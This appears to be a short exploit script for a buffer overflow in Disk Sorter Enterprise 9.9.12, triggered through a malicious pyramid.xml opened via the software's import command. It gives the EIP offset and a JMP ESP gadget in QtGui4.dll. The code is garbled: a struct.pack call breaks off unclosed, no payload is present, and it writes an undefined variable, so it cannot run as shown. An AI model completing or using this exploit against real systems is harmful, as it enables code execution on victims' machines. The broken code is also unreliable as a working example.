#!/usr/bin/python
# Exploit Title : Disk Sorter Enterprise v9.9.12 - 'Import Command' Buffer Overflow
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Website : www.pyramidcyber.com
# Discovery Date : 21/08/2017
# Software Link : http://www.disksorter.com/setups/disksorterent_setup_v9.9.12.exe
# Tested Version : 9.9.12
# Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64
# Steps to Reproduce: Run the python file to generate pyramid.xml and then open disk pulse software , right click and click on import command . Select pyramid.xml file .
import os,struct
#offset to eip
junk = "A" * (1560)
#JMP ESP (QtGui4.dll)
jmp1 = struct.pack(''
f = open('pyramid.xml', 'w')
f.write(file)
f.close()
